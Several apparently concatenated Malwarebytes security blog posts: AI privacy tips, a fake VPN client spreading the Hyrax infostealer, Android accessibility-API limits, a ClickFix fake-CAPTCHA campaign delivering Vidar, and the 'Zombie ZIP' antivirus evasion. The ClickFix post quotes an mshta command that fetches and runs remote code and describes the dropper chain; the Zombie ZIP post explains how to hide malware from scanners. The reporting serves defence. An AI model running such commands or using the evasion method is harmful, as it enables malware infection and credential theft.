We’re clearly not going to abandon all technology. AI isn’t going to eat itself out of existence. It can be pretty useful. We use AI to find threats and scams no one’s seen before, which leads to far better protection. We also use generative AI in Scam Guard to provide 24/7 chat assistance (paired with our deep threat research expertise, of course). Many people use them to save time, draft documents, or explore ideas. Also, sadly, to create little caricatures of themselves.
The key here is thoughtful use.
Limit what information you give to public AI tools, especially health details, financial data, and client-sensitive information.
Review the privacy and data retention policies of AI tools you use regularly.
Delete accounts and apps you no longer need.
Audit app permissions at least twice a year.
Use a VPN to reduce tracking by your internet service provider.
Remove your information from major data broker sites. Check whether your personal info is exposed with a Digital Footprint scan.
Use a reputable password manager and avoid reusing passwords across services.
At Malwarebytes, we believe privacy is a human right. Protecting personal data is inseparable from protecting personal security. The more information that circulates without oversight, the greater the opportunity for misuse, fraud, and harm.
AI will continue to develop. That trajectory is unlikely to slow. The question is whether trust will grow alongside it.
This blog is about how trying to do the “right thing” can lead you straight into a trap. People searching for a VPN ended up downloading credential-stealing malware.
From the victim’s perspective, their trust was exploited at every step: trust in search engines, in familiar logos, in digital signatures, and in the assumption that if things “work in the end,” they must be safe.
Imagine you’re looking for a VPN client to connect to your employer’s network. You use your favorite search engine and, at the top of the search results, you see exactly what you were looking for: listings that look like they belong to established names in the industry. They have the right logo, the right product name, and a description that sounds legitimate.
But what you’re looking at, in the cases Microsoft describes, are search results influenced by SEO poisoning. Search engine optimization (SEO) poisoning comes down to getting a web page to rank highly for relevant search results without buying ads or following legitimate, but tedious, SEO best practices. Instead, cybercriminals use deceptive or outright illegal means to push their pages to the top.
On the spoofed—maybe even cloned—VPN page, everything looks familiar: the vendor branding, product name, and a short blurb about secure remote access. Most importantly, there’s a prominent Download button. You click, expecting an installer from a reputable vendor, but the site quietly redirects you to a GitHub release download instead, offering a ZIP file called something along the lines of VPN-CLIENT.zip.
GitHub is a favorite distribution channel for malware authors because it’s widely trusted. In this campaign, the criminals even signed their file with a legitimate certificate, which has since been revoked. The downloaded ZIP file contains a Microsoft Software Installer (.msi) file that takes the victim through the usualy Install, Next, Next, Finish routine, while side-loading malicious dynamic link library (DLL) files during the installation.
One of those DLLs, dwmapi.dll, is acting as a loader, launching embedded shellcode that in turn runs inspector.dll, a variant of the Hyrax infostealer. From the moment the install finishes, your VPN client is not just a client but also a credential thief.
When you start using your new VPN, several things happen in quick succession:
The fake VPN client captures your username, password, and target URI, and hands this data to the Hyrax infostealer component.
Hyrax also reads existing VPN configuration data, scooping up any stored connections and saved credentials.
The malware sends all the stolen information to attacker‑controlled infrastructure.
All the user sees is a plausible‑sounding error like “connection failed” or “installation problem.” To top things off, the malware provides instructions to download the legitimate VPN client from official sources. In certain instances, it even opens the user’s browser to the real VPN website. All this, of course, to alleviate suspicion.
The rest happens on the employer’s network. The attacker can now log into the corporate VPN as you, from infrastructure they control, and immediately blend in with normal remote access traffic. If your account has access to file shares, internal admin panels, ticketing systems, or cloud services, they can start exploring or abusing these resources.
How to stay away from fake VPN clients
Now that you know what to look for, you’re already one step ahead. Here are some more general tips to stay safe:
Never trust search results alone, especially for security software. Go straight to the vendor’s website.
Double‑check the domain before downloading. Are you still on the vendor’s site or a trusted platform? If needed, verify the download link with your IT department.
Report “failed” VPN installs to IT. Don’t keep retrying. An unexpected failure followed by a redirect should raise a red flag.
Don’t store corporate VPN credentials in personal password managers or browsers.
If you’ve ever installed a VPN client from an untrusted site or an unusual domain, assume your VPN credentials may be compromised and request a reset.
We don’t just report on privacy—we offer you the option to use it.
Privacy risks should never spread beyond a headline. Keep your online privacy yours by using Malwarebytes Privacy VPN.
Google just dropped a bombshell for app developers with the latest version of its Android mobile operating system. The company can now prevent apps from installing if they try to use the system’s accessibility features.
The new development, live in version 17.2 of Android, is all about security, explains the company. It stops certain kinds of apps from using the accessibility service if Advanced Protection Mode (APM) is enabled.
The accessibility API lets app developers support users living with disabilities who need extra help using their phones. Apps can use this API to access the screen in unique ways, control input for the user, and use voice services, for example.
Sadly, as with most useful tools, someone will always find a way to misuse it and ruin it for everyone else. Malware developers have been using this API for years as a way into your bank account. The accessibility service has a lot of power: Any app with permissions to use it can read what’s on your screen.
Many Android banking Trojans are little more than accessibility API wrappers with criminal intent. They steal 2FA codes, impersonate victims, and drain accounts while victims sleep.
Two tricks dominate. The first is fake overlays. The accessibility API lets you put overlays on top of another app’s screen. Banking and cryptocurrency Trojan developers can use this to capture your keystrokes (you think you’re just logging into your banking app, but malware is collecting everything you type).
The second is permission abuse. Once the Trojan has your passwords, it can authorize its own transactions.
The number of malware frameworks taking advantage of the accessibility API has grown. DroidLock uses it to steal your personal data before demanding a ransom. Albiriox uses it to install itself and give remote control to attackers halfway around the world.
We saw both in December, and just last month Malwarebytes researcher Stefan Dasic noticed an accessibility service-abusing malware program posing as a fake Google Security page.
Google’s nuclear option
Google has tried before to curb misuse of the API. In 2017, it warned developers to justify their use of accessibility features or risk removal from the Play Store. Developers revolted, and Google relented. But then, in November 2021, it began demanding permission forms for accessibility API usage for Android 12+ apps.
Now the company is getting tougher still, enforcing stricter accessibility API rules. Apps can no longer freely enable accessibility services using a simple software flag. Instead, only apps whose core purpose is accessibility will be allowed to use it.
Google’s examples include screen readers, switch inputs, voice controls, and Braille displays. With these new rules, password managers or automation apps aren’t getting to the accessibility API anymore.
At least, not if the user has APM turned on.
Launched in May last year, APM is Google’s version of Apple’s Lockdown Mode. It introduces far tighter security controls for people who switch it on, making it harder for malware to exploit them.
The trade-off for that extra security is more limited functionality. For example, only apps from trusted sources will install, and data transfer via USB is restricted. Accessibility API access is now restricted too.
So now, you can be a password manager or an accessibility tool, but not both. Developers relying on accessibility for convenience features will need to find another way.
This is Google acknowledging that some APIs are too dangerous to leave open, even if some legitimate apps suffer. The company is betting that most users care more about not getting robbed than having their password manager use the accessibility API for convenience.
Malware authors will adapt, as always. But for now, Google just made phones with APM turned on a lot harder to mess with.
We don’t just report on phone security—we provide it
In recent years, ClickFix and fake CAPTCHA techniques have become a popular way for cybercriminals to distribute malware. Instead of exploiting a technical vulnerability, these attacks rely on convincing people to run malicious commands themselves.
Our researchers have recently detected a campaign that ultimately delivers the Vidar infostealer, using several different infection chains.
One of the methods used in this campaign involves installing a malicious installer delivered through fake CAPTCHA pages hosted on compromised WordPress websites. We detected a number of compromised websites involved in the campaign, located in countries including Italy, France, the United States, the United Kingdom, and Brazil.
What is Vidar?
Vidar is a well-known infostealer malware family designed to harvest sensitive data from infected systems. It typically targets:
Browser-stored usernames and passwords
Cryptocurrency wallet information
Session cookies and authentication tokens
Autofill data and saved payment information
Files that may contain sensitive data
Because Vidar loads in memory and communicates with remote command servers, it can quietly collect and exfiltrate data without obvious signs of infection.
Fake CAPTCHA: the never-ending story
When a user visits a compromised website, they may see a screen mimicking Cloudflare’s familiar “Verifying you are human” page.
This technique has been widely used since 2024 and has evolved through numerous variations over time, both in its visual appearance and in the malicious commands that start the infection chain.
The fake CAPTCHA message shown to the user.
The page instructs the visitor to copy and run a malicious command that starts the infection chain, in this case:
mshta https://{compromised website}/challenge/cf
Mshta is a legitimate Windows binary designed to execute Microsoft HTML Application (HTA). Because it is built into Windows, attackers have abused it since the early days of the ClickFix campaigns.
In this case, the command launches a simple obfuscated HTA script, which eventually downloads and installs malware associated with the Vidar infostealer.
HTA-based MSI dropper
The HTA script is the intermediate stage that downloads and runs a malicious MSI installer. An MSI is a Windows installation package normally used to install software, but attackers frequently abuse it to deliver malware.
The script performs several operations:
The window is resized to 0x0 and moved off-screen, making the application invisible to the user.
The script terminates if the document.location.href doesn’t start with http.
The strings are decoded using XOR and a random key.
Through WMI queries, the script checks for installed antivirus products.
It creates hidden working folders in a random folder under \AppData\Local to drop the MSI file.
In the end, the script downloads the malicious MSI from a compromised website. The downloaded file must be larger than 100 KB to be considered valid. Finally, it removes the :Zone.Identifier alternate data stream.
The malicious HTA script.
In this case, the malicious MSI was downloaded using the following command:
The MSI defines a CustomAction ConfigureNetFx, and it executes a GoLang loader.
Malware loaders (also known as droppers or downloaders) are common tools in the cybercrime ecosystem. Their main job is to stealthily compromise a system and then deliver one or more additional malware payloads.
In this campaign, the loader ultimately decrypts and executes the Vidar infostealer. The executable has different names in the different MSI samples analyzed.
The custom action defined in the MSI.
The Golang loader decodes a shellcode that performs different anti-analysis checks, including:
CheckRemoteDebuggerPresent
IsDebuggerPresent
QueryPerformanceCounter
GetTickCount
After several intermediate steps, the loader decrypts and loads Vidar infostealer directly into memory.
Analysis of compromised websites
The malicious iframe injected into the compromised websites was generated by the domains cdnwoopress[.]com or woopresscdn[.]com in the analyzed cases.
The malicious iframe injected into the compromised website.
The injected code has several functions, and the command used in the fake CAPTCHA attack is obtained from the /api/get_payload endpoint.
Code injected into the compromised websites.
Because the malicious website was misconfigured, we were able to view the backend code injected into the compromised WordPress sites.
The injected script performs several actions:
Creates the file wp-cache-manager.php if it doesn’t already exist, obtaining its contents from the endpoint /api/plugin.
Sends a heartbeat request every hour containing the domain name, site URL, WordPress version, and status.
During page loads (template_redirect), the script filters visitors based on User-Agent and targets Windows desktop visitors.
Requests /api/inject?domain=domain from the remote command server. The response HTML is then displayed, replacing the normal WordPress page.
The malicious code injected in the compromised WordPress site.
How to stay safe
Attacks like this rely on tricking people into running commands themselves, so a few simple precautions can make a big difference.
Slow down. If a webpage asks you to run commands on your device or copy and paste code, pause and think before following the instructions. Cybercriminals often create a sense of urgency with fake security checks, countdown timers, or warnings designed to make you act without thinking.
Never run commands from untrusted sources. A legitimate website should never require you to press Win+R, open Terminal, or paste commands into PowerShell just to verify you are human. If a page asks you to do this, treat it as suspicious.
Verify instructions independently. If a website tells you to execute a command or perform a technical action, check official documentation or contact support through trusted channels before doing anything.
Be cautious with copy and paste. Some attacks hide malicious commands in copied text. If you ever need to run a command from documentation, typing it manually can help reduce the risk of running hidden code.
Protect your device. Keep your operating system and browser updated and use security software that can block malicious websites and detect infostealer malware.
Stay informed. Techniques like fake CAPTCHA pages and ClickFix attacks continue to evolve. Knowing that attackers may try to trick you into running commands yourself can help you spot these scams before they succeed.
Pro tip: The free Malwarebytes Browser Guard extension can warn you if a website attempts to copy content to your clipboard, which may help prevent this type of attack.
A researcher published “Zombie ZIP,” a simple way to change the first part (header) of a ZIP file so it falsely claims its contents are uncompressed while they are actually compressed.
Many antivirus products trust that header and never properly decompress or inspect the real payload. In tests conducted about a week after disclosure, around 60 of 63 common antivirus suites failed to detect malware hidden this way—roughly 95% of engines let it pass.
Zombie ZIP is essentially a method to create a malformed ZIP file that can bypass detection by most antivirus scanners. The technique has a major caveat, though. The malformed ZIP file requires a custom loader to open it correctly. Any normal archive utility like the built-in Windows extractor, 7-zip, WinRAR, and others will also flag the file as malformed.
The vulnerability is tracked as CVE-2026-0866, although several cybersecurity researchers dispute whether it should be categorized as a vulnerability or assigned a CVE at all. The fact that it requires a custom loader makes it almost impossible for this method to infect a system that is not already compromised.
It still allows anti-malware solutions to detect both the custom loader and any known malware once the payload is properly decompressed. In other words, the bypass only affects the initial inspection of the ZIP file, not the actual execution of already known malware.
On their GitHub page (currently blocked by Malwarebytes Browser Guard due to a risky pattern), the researchers explain how the Zombie ZIP method works.
By changing the file’s compressiontype to 0 (STORED), tools trying to read the archive assume the file’s contents are simply stored inside the ZIP file and not compressed.
“AV engines trust the ZIP Method field. When Method=0 (STORED), they scan the data as raw uncompressed bytes. But the data is actually DEFLATE compressed — so the scanner sees compressed noise and finds no signatures.
The CRC is set to the uncompressed payload’s checksum, creating an additional mismatch that causes standard extraction tools (7-Zip, unzip, WinRAR) to report errors or extract corrupted output.
However, a purpose-built loader that ignores the declared method and decompresses as DEFLATE recovers the payload perfectly.
The vulnerability is scanner evasion: security controls assert ‘no malware present’ while malware is present and trivially recoverable by attacker tooling.”
Security researcher Didier Stevens published a method to safely examine the content of a malformed Zombie ZIP file. One way to spot the manipulation is by comparing the ZIP header fields compressedsize and uncompressedsize. If they are different, that means the ZIP file is not actually STORED, but compressed.
We don’t just report on threats—we remove them
Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.